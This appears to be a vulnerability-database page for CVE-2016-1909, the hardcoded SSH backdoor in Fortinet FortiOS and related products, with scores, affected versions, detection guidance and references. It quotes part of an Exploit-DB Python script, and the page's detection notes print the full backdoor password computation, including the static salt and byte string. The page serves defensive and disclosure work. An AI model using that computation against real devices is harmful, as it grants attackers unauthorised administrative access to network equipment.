CVE-2016-1909
published 2016-01-15CVE-2016-1909: Fortinet FortiAnalyzer before 5.0.12 and 5.2.x before 5.2.5; FortiSwitch 3.3.x before 3.3.3; FortiCache 3.0.x before 3.0.8; and FortiOS 4.1.x before 4.1.11…
PriorityP184critical9.8CVSS 3.0
AVNACLPRNUINSUCHIHAH
EXPLOIT
EPSS
71.27%
99.3th percentile
Fortinet FortiAnalyzer before 5.0.12 and 5.2.x before 5.2.5; FortiSwitch 3.3.x before 3.3.3; FortiCache 3.0.x before 3.0.8; and FortiOS 4.1.x before 4.1.11, 4.2.x before 4.2.16, 4.3.x before 4.3.17 and 5.0.x before 5.0.8 have a hardcoded passphrase for the Fortimanager_Access account, which allows remote attackers to obtain administrative access via an SSH session.
Affected
10 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| fortinet | fortios | <= 4.3.16 | — |
| fortinet | fortios | — | — |
| fortinet | fortios | — | — |
| fortinet | fortios | — | — |
| fortinet | fortios | — | — |
| fortinet | fortios | — | — |
| fortinet | fortios | — | — |
| fortinet | fortios | — | — |
| fortinet | fortios | — | — |
| fortinet | fortios | — | — |
Detection & IOCsextracted from sources · hover to see the quote
bytes↗
\xA3\x88\xBA\x2E\x42\x4C\xB0\x4A\x53\x79\x30\xC1\x31\x07\xCC\x3F\xA1\x32\x90\x29\xA9\x81\x5B\x70
- →Detect SSH authentication attempts using the hardcoded backdoor username 'Fortimanager_Access' on Fortinet devices; any login attempt with this username should be treated as malicious. ↗
- →The exploit uses SSH keyboard-interactive authentication (auth_interactive) after an initial password auth attempt; monitor for this two-step SSH auth sequence targeting 'Fortimanager_Access'. ↗
- →The challenge-response password is computed as 'AK1' + base64(\x00*12 + SHA1(\x00*12 + challenge + 'FGTAbc11*xy+Qqz27' + static_bytes)); network signatures can match the 'AK1' prefix in SSH keyboard-interactive responses. ↗
- →A Metasploit auxiliary scanner module exists for mass-scanning this backdoor; watch for automated SSH scanning activity against Fortinet devices on port 22. ↗
- →Affected platforms include FortiGate 4.x; prioritize detection on FortiOS 4.1.x, 4.2.x, 4.3.x, 5.0.x, FortiAnalyzer before 5.0.12/5.2.5, FortiSwitch 3.3.x, and FortiCache 3.0.x. ↗
- ·The backdoor account 'Fortimanager_Access' is hardcoded in firmware; patching to fixed versions is required to remove it — detection alone is insufficient for remediation. ↗
- ·The challenge-response mechanism uses a static salt string ('FGTAbc11*xy+Qqz27') and a static byte sequence appended to the SHA1 hash, meaning the password is deterministically computable from any SSH challenge — blocking the username is the only reliable network-level control. ↗
CVSS provenance
nvdv3.09.8CRITICALCVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
nvdv2.010.0CRITICALAV:N/AC:L/Au:N/C:C/I:C/A:C
CVEs like this are exactly what “Exploited This Week” covers.
Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.
No detection rules found.
Exploit-DB
Fortinet FortiGate 4.x < 5.0.7 - SSH Backdoor Access
exploitdb·2016-01-09
CVE-2016-1909 Fortinet FortiGate 4.x < 5.0.7 - SSH Backdoor Access
Fortinet FortiGate 4.x
import socket
import select
import sys
import paramiko
from paramiko.py3compat import u
import base64
import hashlib
import termios
import tty
def custom_handler(title, instructions, prompt_list):
n = prompt_list[0][0]
m = hashlib.sha1()
m.update('\x00' * 12)
m.update(n + 'FGTAbc11*xy+Qqz27')
m.update('\xA3\x88\xBA\x2E\x42\x4C\xB0\x4A\x53\x79\x30\xC1\x31\x07\xCC\x3F\xA1\x32\x90\x29\xA9\x81\x5B\x70')
h = 'AK1' + base64.b64encode('\x00' * 12 + m.digest())
return [h]
def main():
if len(sys.argv) '
exit(-1)
client = paramiko.SSHClient()
client.set_missing_host_key_policy(paramiko.AutoAddPolicy())
try:
client.connect(sys.argv[1], username='', allow_agent=False, look_for_keys=False)
except paramiko.ssh_exception.SSHException:
pass
trans = client.get_transport()
try:
Metasploit
Fortinet SSH Backdoor Scanner
metasploit
Fortinet SSH Backdoor Scanner
Fortinet SSH Backdoor Scanner
This module scans for the Fortinet SSH backdoor.
http://blog.fortinet.com/post/brief-statement-regarding-issues-found-with-fortioshttp://packetstormsecurity.com/files/135225/FortiGate-OS-5.0.7-SSH-Backdoor.htmlhttp://seclists.org/fulldisclosure/2016/Jan/26http://www.fortiguard.com/advisory/multiple-products-ssh-undocumented-login-vulnerabilityhttp://www.securitytracker.com/id/1034663https://twitter.com/esizkur/status/686842135501508608https://www.exploit-db.com/exploits/39224/http://blog.fortinet.com/post/brief-statement-regarding-issues-found-with-fortioshttp://packetstormsecurity.com/files/135225/FortiGate-OS-5.0.7-SSH-Backdoor.htmlhttp://seclists.org/fulldisclosure/2016/Jan/26http://www.fortiguard.com/advisory/multiple-products-ssh-undocumented-login-vulnerabilityhttp://www.securitytracker.com/id/1034663https://twitter.com/esizkur/status/686842135501508608https://www.exploit-db.com/exploits/39224/
2016-01-15
Published